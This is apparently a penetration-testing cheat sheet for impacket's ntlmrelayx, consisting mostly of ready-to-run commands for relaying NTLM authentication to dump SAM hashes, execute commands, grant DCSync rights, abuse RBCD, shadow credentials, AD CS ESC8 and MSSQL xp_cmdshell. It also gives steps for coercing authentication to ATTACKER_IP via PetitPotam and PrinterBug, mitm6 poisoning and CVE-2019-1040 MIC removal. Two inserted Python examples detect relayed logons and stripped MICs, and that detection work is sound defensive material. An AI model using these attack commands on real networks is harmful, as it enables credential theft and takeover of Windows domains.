Overview

ntlmrelayx intercepts NTLM authentication and relays it to a target service, executing actions with the victim’s privileges. It does not crack passwords — it forwards the live authentication handshake to a different host. It works against targets where SMB signing is not required (for SMB relay) or where LDAP, HTTP, or MSSQL services accept NTLM authentication.

# Install
pip install impacket
# Or from source
git clone https://github.com/fortra/impacket && cd impacket && pip install .
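Seen from the target, a relayed logon is an NTLM network logon that arrives from the relay host's address while still carrying the victim workstation's name. The following Python is an added detection example, not code from this page or from impacket: the host inventory, the event records and their key=value format are constructed, and the name/address mismatch heuristic assumes the relay forwards the client's Workstation field unchanged.

```python
# Added example (not from the ntlmrelayx page or impacket): a detection
# heuristic for relayed NTLM logons in Windows Security log 4624 events.
# A relayed authentication reaches the target from the relay host, so the
# target logs Logon Type 3 / package NTLM with the victim's WorkstationName
# but the relay's IpAddress. The inventory and the events are constructed.

# Constructed inventory: the address each workstation normally logs on from.
INVENTORY = {"WS01": "10.10.10.50", "WS02": "10.10.10.51", "DC01": "10.10.10.1"}

def parse_4624(line: str) -> dict:
    """Parse one constructed 'Key=Value' 4624 record (field names as in the event)."""
    return dict(part.split("=", 1) for part in line.split())

def is_relay_suspect(ev: dict, inventory=INVENTORY) -> bool:
    """NTLM network logon from an address the claimed workstation does not own.
    Multi-homed hosts, NAT and VPN pools cause false positives: tune the inventory."""
    if ev["LogonType"] != "3" or ev["AuthenticationPackageName"].upper() != "NTLM":
        return False
    expected = inventory.get(ev["WorkstationName"].upper())
    return expected is not None and expected != ev["IpAddress"]

def find_suspects(lines) -> list:
    """Return 'user@workstation<-ip' for each suspicious record."""
    return [f"{e['TargetUserName']}@{e['WorkstationName']}<-{e['IpAddress']}"
            for e in map(parse_4624, lines) if is_relay_suspect(e)]

# Constructed sample events; the second is what a relay against this host
# looks like: alice's WS01 credentials arriving from 10.10.10.99.
SAMPLE_EVENTS = [
    "EventID=4624 TargetUserName=alice LogonType=3 AuthenticationPackageName=NTLM "
    "WorkstationName=WS01 IpAddress=10.10.10.50",
    "EventID=4624 TargetUserName=alice LogonType=3 AuthenticationPackageName=NTLM "
    "WorkstationName=WS01 IpAddress=10.10.10.99",
    "EventID=4624 TargetUserName=bob LogonType=3 AuthenticationPackageName=Kerberos "
    "WorkstationName=WS02 IpAddress=10.10.10.99",
    "EventID=4624 TargetUserName=svc LogonType=2 AuthenticationPackageName=NTLM "
    "WorkstationName=DC01 IpAddress=127.0.0.1",
]

if __name__ == "__main__":
    print(find_suspects(SAMPLE_EVENTS))  # ['alice@WS01<-10.10.10.99']
```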

Enumerate Relay Targets

Before relaying, identify hosts that do not require SMB signing.
# NetExec — generate relay target list
nxc smb 10.10.10.0/24 --gen-relay-list targets.txt

# Targets with SMB signing disabled/not required end up in targets.txt
cat targets.txt

Basic Relay to SMB

Relay captured NTLM authentication to SMB on another host. The default action dumps the SAM hashes, which requires the relayed user to be a local administrator on the target.
# Dump SAM (default action)
impacket-ntlmrelayx -tf targets.txt -smb2support

# Execute a command instead
impacket-ntlmrelayx -tf targets.txt -smb2support -c "whoami > C:\temp\pwned.txt"

# Get an interactive SMB shell
impacket-ntlmrelayx -tf targets.txt -smb2support -i

# Relay to a single target
impacket-ntlmrelayx -t smb://10.10.10.5 -smb2support

Relay to LDAP

Relaying to LDAP allows domain-level attacks: creating machine accounts, setting RBCD, writing shadow credentials, or modifying ACLs. Each requires the relayed account to hold the necessary privileges (e.g., domain admin for ACL changes, or, for adding a computer, any domain user when ms-DS-MachineAccountQuota > 0).

Add a Computer Account

impacket-ntlmrelayx -t ldap://DC01.corp.local --add-computer FAKEPC$ 'P@ssw0rd!'

Resource-Based Constrained Delegation (RBCD)

Write msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer object so that a computer account you control (FAKEPC$ below) can impersonate any user to services on that target.
# Step 1: Relay to LDAP and set RBCD on the target machine
impacket-ntlmrelayx -t ldap://DC01.corp.local --delegate-access --escalate-user FAKEPC$

# Step 2: Request a service ticket via S4U
impacket-getST -spn cifs/TARGET.corp.local -impersonate Administrator -dc-ip 10.10.10.1 'corp.local/FAKEPC$:P@ssw0rd!'

# Step 3: Use the ticket
export KRB5CCNAME=Administrator@cifs_TARGET.corp.local@CORP.LOCAL.ccache
impacket-psexec -k -no-pass TARGET.corp.local

Shadow Credentials

Write msDS-KeyCredentialLink on the account named by --shadow-target to obtain a certificate for it, then use that certificate to request a TGT.
impacket-ntlmrelayx -t ldap://DC01.corp.local --shadow-credentials --shadow-target TARGET$

ACL Abuse (Escalate User)

Grant a controlled user DCSync or other privileges.
# Grant DCSync rights to a controlled user
impacket-ntlmrelayx -t ldap://DC01.corp.local --escalate-user lowprivuser

Relay to AD CS (ESC8)

If the AD CS web enrollment endpoint (certsrv) is reachable over HTTP, relay NTLM authentication to it to request a certificate as the victim (ESC8).
# Relay to the CA web enrollment endpoint
impacket-ntlmrelayx -t http://CA01.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# For a machine account certificate (combine with PetitPotam)
impacket-ntlmrelayx -t http://CA01.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template Machine

ntlmrelayx prints the issued certificate as Base64; decode it to a .pfx file and authenticate with it using certipy or impacket-getTGT:
# Authenticate with the certificate
certipy auth -pfx dc01.pfx -dc-ip 10.10.10.1

Relay to MSSQL

Execute SQL queries through a relayed NTLM session.
# Execute a query
impacket-ntlmrelayx -t mssql://10.10.10.20 -smb2support -q "SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin');"

# Enable xp_cmdshell and run OS command
impacket-ntlmrelayx -t mssql://10.10.10.20 -smb2support -q "EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'whoami';"

Targets File (-tf)

The targets file takes one target per line, each with its protocol prefix, so a single run can relay to several hosts and services.
smb://10.10.10.5
smb://10.10.10.6
ldap://DC01.corp.local
ldaps://DC01.corp.local
http://CA01.corp.local/certsrv/certfnsh.asp
mssql://10.10.10.20

# Relay to every target listed in the file
impacket-ntlmrelayx -tf targets.txt -smb2support

Combine with Responder

Responder poisons LLMNR/NBT-NS/mDNS to capture NTLM authentication. Disable SMB and HTTP in Responder so ntlmrelayx receives the connections instead.
# Edit Responder config — disable SMB and HTTP servers
# /etc/responder/Responder.conf (or /usr/share/responder/Responder.conf)
# SMB = Off
# HTTP = Off

# Start Responder (poisoning only)
sudo responder -I eth0 -dwPv

# In another terminal — start ntlmrelayx
impacket-ntlmrelayx -tf targets.txt -smb2support

Combine with PetitPotam / PrinterBug

Coerce a machine account to authenticate to your relay server. Machine account authentication is useful for RBCD, shadow credentials, and AD CS attacks.

PetitPotam (MS-EFSRPC)

# Coerce DC01 to authenticate to your relay listener
python3 PetitPotam.py ATTACKER_IP DC01.corp.local

# ntlmrelayx catches DC01$ machine account authentication
impacket-ntlmrelayx -t ldap://DC02.corp.local --delegate-access --escalate-user FAKEPC$

# Or relay to AD CS
impacket-ntlmrelayx -t http://CA01.corp.local/certsrv/certfnsh.asp --adcs --template DomainController

PrinterBug (MS-RPRN)

# Coerce target to authenticate back to attacker
python3 dementor.py ATTACKER_IP TARGET.corp.local -u user -p pass -d corp.local

# Or with SpoolSample
SpoolSample.exe TARGET.corp.local ATTACKER_IP

SOCKS Proxy Mode

Keep relayed sessions alive and interact with them through a SOCKS proxy. Useful for maintaining access across multiple relayed sessions.
# Start ntlmrelayx in SOCKS mode
impacket-ntlmrelayx -tf targets.txt -smb2support -socks

# List active sessions in the ntlmrelayx console
ntlmrelayx> socks

# Use proxychains with the SOCKS proxy (default port 1080)
# /etc/proxychains.conf: socks4 127.0.0.1 1080
proxychains impacket-secretsdump corp.local/relayeduser@10.10.10.5

proxychains impacket-smbclient //10.10.10.5/C$ -no-pass

proxychains nxc smb 10.10.10.5 -u relayeduser -p '' -d corp.local --sam

IPv6 Attack with mitm6

mitm6 replies to DHCPv6 requests and poisons DNS so that IPv6-enabled Windows hosts send their NTLM authentication to the relay.
# Terminal 1: Start mitm6
sudo mitm6 -d corp.local

# Terminal 2: Start ntlmrelayx targeting LDAP
impacket-ntlmrelayx -6 -t ldaps://DC01.corp.local -wh wpad.corp.local --delegate-access --add-computer
The -6 flag enables IPv6 listening. The -wh flag sets up a WPAD server to trigger proxy authentication.

Remove MIC (CVE-2019-1040)

The Message Integrity Code (MIC) is a signature over all three NTLM messages that lets the target detect a relay tampering with them. Removing it bypasses this protection on targets that do not enforce its presence (unpatched for CVE-2019-1040).
impacket-ntlmrelayx -t ldap://DC01.corp.local --remove-mic --escalate-user lowprivuser
This drops the MIC from the NTLM AUTHENTICATE_MESSAGE so the relay succeeds against targets vulnerable to CVE-2019-1040 (those without the June 2019 patches).
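As an added example (not from this page or from impacket), the Python below parses an NTLM AUTHENTICATE_MESSAGE and checks that the MIC described above is present and consistent with the MsvAvFlags AV_PAIR, which is how a network sensor would spot stripped-MIC authentication. The sample messages it builds are constructed, with a placeholder MIC and an arbitrary NegotiateFlags value.

```python
# Added example (not from the ntlmrelayx page or impacket): inspect an NTLM
# AUTHENTICATE_MESSAGE (MS-NLMP 2.2.1.3) for a stripped MIC. A MIC-capable
# client sets bit 0x2 of the MsvAvFlags AV_PAIR inside its NTLMv2 response and
# fills the 16-byte MIC field; a cleared flag or a zeroed MIC is the anomaly to
# alert on. All bytes below are constructed; the MIC is a placeholder, not an HMAC.
import struct

MSV_AV_EOL, MSV_AV_FLAGS, MIC_PRESENT = 0x0000, 0x0006, 0x00000002
MIC_OFFSET, PAYLOAD_OFFSET = 72, 88  # fixed offsets in AUTHENTICATE_MESSAGE

def parse_av_pairs(blob: bytes) -> dict:
    """Walk the AV_PAIR list (AvId, AvLen, Value) until MsvAvEOL."""
    pairs, pos = {}, 0
    while pos + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        if av_id == MSV_AV_EOL:
            break
        pairs[av_id] = blob[pos + 4:pos + 4 + av_len]
        pos += 4 + av_len
    return pairs

def mic_status(msg: bytes) -> str:
    """'intact', 'flag-set-mic-zero', 'flag-cleared' (also NTLMv1: no AV pairs) or 'not-authenticate'."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 3:
        return "not-authenticate"
    nt_len, _, nt_off = struct.unpack_from("<HHI", msg, 20)  # NtChallengeResponseFields
    nt_resp = msg[nt_off:nt_off + nt_len]
    # NTLMv2_RESPONSE = 16-byte NTProofStr + 28-byte client challenge header + AV_PAIRs
    flags_raw = parse_av_pairs(nt_resp[44:]).get(MSV_AV_FLAGS, b"\x00" * 4)
    if not struct.unpack("<I", flags_raw)[0] & MIC_PRESENT:
        return "flag-cleared"
    return "intact" if any(msg[MIC_OFFSET:MIC_OFFSET + 16]) else "flag-set-mic-zero"

def build_sample(mic_flag: bool, mic: bytes) -> bytes:
    """Constructed AUTHENTICATE_MESSAGE whose only payload is an NTLMv2 response."""
    av = struct.pack("<HHI", MSV_AV_FLAGS, 4, MIC_PRESENT if mic_flag else 0)
    av += struct.pack("<HH", MSV_AV_EOL, 0)
    nt_resp = b"\x11" * 16 + b"\x01\x01" + b"\x00" * 26 + av
    msg = b"NTLMSSP\x00" + struct.pack("<I", 3)
    msg += struct.pack("<HHI", 0, 0, PAYLOAD_OFFSET)  # LmChallengeResponse: empty
    msg += struct.pack("<HHI", len(nt_resp), len(nt_resp), PAYLOAD_OFFSET)
    for _ in range(4):  # Domain, User, Workstation, SessionKey fields: empty
        msg += struct.pack("<HHI", 0, 0, PAYLOAD_OFFSET + len(nt_resp))
    msg += struct.pack("<I", 0xE2888215) + b"\x00" * 8 + mic  # flags, version, MIC
    return msg + nt_resp
```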

Quick Reference

Task                           | Command
-------------------------------|----------------------------------------------------------------------------------
Relay to SMB (dump SAM)        | impacket-ntlmrelayx -tf targets.txt -smb2support
Relay to SMB (exec command)    | impacket-ntlmrelayx -t smb://HOST -c "cmd"
Relay to LDAP (add computer)   | impacket-ntlmrelayx -t ldap://DC --add-computer
Relay to LDAP (RBCD)           | impacket-ntlmrelayx -t ldap://DC --delegate-access --escalate-user PC$
Relay to LDAP (shadow creds)   | impacket-ntlmrelayx -t ldap://DC --shadow-credentials --shadow-target TARGET$
Relay to AD CS (ESC8)          | impacket-ntlmrelayx -t http://CA/certsrv/certfnsh.asp --adcs --template Machine
Relay to MSSQL                 | impacket-ntlmrelayx -t mssql://HOST -q "SELECT SYSTEM_USER"
SOCKS mode                     | impacket-ntlmrelayx -tf targets.txt -socks
IPv6 + LDAP relay              | impacket-ntlmrelayx -6 -t ldaps://DC -wh wpad.corp.local
Remove MIC (CVE-2019-1040)     | impacket-ntlmrelayx -t ldap://DC --remove-mic
Gen relay targets (nxc)        | nxc smb SUBNET --gen-relay-list targets.txt